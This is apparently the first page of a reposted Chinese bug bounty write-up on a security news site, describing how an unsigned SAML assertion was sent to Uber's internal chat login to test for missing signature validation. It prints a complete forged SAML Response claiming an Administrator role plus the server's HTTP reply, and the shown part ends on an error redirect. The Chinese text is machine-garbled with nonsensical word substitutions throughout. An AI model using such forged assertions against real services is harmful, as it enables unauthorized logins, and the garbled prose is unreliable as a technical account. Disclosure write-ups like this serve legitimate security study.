欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

看俺怎样运用SAML漏洞达到Uber内部聊天平台未授权登陆

来源:本站整理 作者:佚名 时间:2017-09-14 TAG: 我要投稿


本文讲述了应用SAML(安全申明标志说话)办事漏洞破绽bug,绕过优步(Uber)公司外部谈天体系身份认证机制,完成了对该外部谈天体系的未受权登录拜访,该漏洞破绽bug终极得到Uber民间8500美元嘉奖。
漏洞破绽bug发明
经由过程Uber的漏洞破绽bug赏金名目规模,我应用域名摸索网站https://crt.sh,发明了其外部谈天体系https://uchat.uberinternal.com/login,该体系请求应用Uber外部员工的SSO凭证停止登录。

综合先前对Uber网络体系的研讨,我预测该体系的身份认证机制应该是基于SAML(安全申明标志说话)停止身份跨域通报和登录的,别的,我还发明了该体系应用SAML的办事端:
https://uchat.uberinternal.com/login/sso/saml
SAML:安全申明标志说话(Security Assertion Markup Language),它是一个基于XML的尺度,用于在分歧安全域(security domain)之间互换认证和受权数据。SAML尺度界说了身份提供者(identity provider)和办事提供者(service provider),这二者构成为了分歧的安全域。为了包管身份安全,咱们除能够采纳加密署名等步伐,还可采纳SAML标准来传输,传输的数据以XML情势为主,内容相符SAML的保举尺度。
为了发明该体系SAML框架的办事漏洞破绽bug,我决议结构一个简略的SAML申明,经由过程POST哀求方法把它发送到其办事端去。无关SAML单点登录(SSO)的根本机制,可点此懂得检查。
为了验证该谈天体系SAML办事能否安排了署名校验功效,我打算在POST哀求中参加一个不带署名的简略XML标志,构成SAML哀求一并发送至SAML办事端。该XML标志内容为:
samlp:Response xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="R0bdb6f33ef84425aa2782eab4483792762f297df" Version="2.0" IssueInstant="2016-05-04T01:37:34Z" Destination="" InResponseTo="ONELOGIN_bd24d63eafe235201b1bc636823c84381dbe575c">
samlp:Status>
samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
samlp:Status>
saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" Version="2.0" ID="pfxb75932c2-2e44-d18d-224b-354849a292af" IssueInstant="2016-05-04T01:37:34Z">
saml:Subject>
saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">
michael@test
saml:NameID>
saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
saml:SubjectConfirmationData NotOnOrAfter="2016-05-04T01:40:34Z" Recipient="" InResponseTo="ONELOGIN_bd24d63eafe235201b1bc636823c84381dbe575c"/>
saml:SubjectConfirmation>
saml:Subject>
saml:Conditions NotBefore="2016-05-04T01:34:34Z" NotOnOrAfter="2016-05-04T01:40:34Z">
saml:AudienceRestriction>
saml:Audience>
php-saml
saml:Audience>
saml:AudienceRestriction>
saml:Conditions>
saml:AuthnStatement AuthnInstant="2016-05-04T01:37:33Z" SessionNotOnOrAfter="2016-05-05T01:37:34Z" SessionIndex="_b340ffa0-f3c6-0133-3483-02a5406d9a2f">
saml:AuthnContext>
saml:AuthnContextClassRef>
urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport
saml:AuthnContextClassRef>
saml:AuthnContext>
saml:AuthnStatement>
saml:AttributeStatement>
saml:Attribute> saml:Attribute NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic" Name="Email">
saml:AttributeValue xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">
noreply@uber.com
saml:AttributeValue>
saml:Attribute>
saml:Attribute NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic" Name="memberOf">
saml:AttributeValue xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">
Administrator
saml:AttributeValue>
saml:Attribute>
saml:AttributeStatement>
saml:Assertion>
samlp:Response>
当把以上这个SAML哀求发送至谈天体系的SAML办事端后,该谈天体系远端办事器居然给出了一个有用相应,它完整没对SAML哀求的署名停止校验,其有用相应以下:
HTTP/1.1 302 Found
Date: Sat, 22 Apr 2017 08:33:35 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 0
Connection: keep-alive
Server: nginx/1.11.5
Set-Cookie: srv_id=; expires=Sun, 23-Apr-17 08:33:35 GMT; domain=uberinternal.com; path=/
Content-Security-Policy: frame-ancestors ‘self’
Location: /error?title=uchat+%28staging%29+needs+your+help%3A&message=SAML+login+was+unsuccessful+because+one+of+the+attributes+is+incorrect.

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载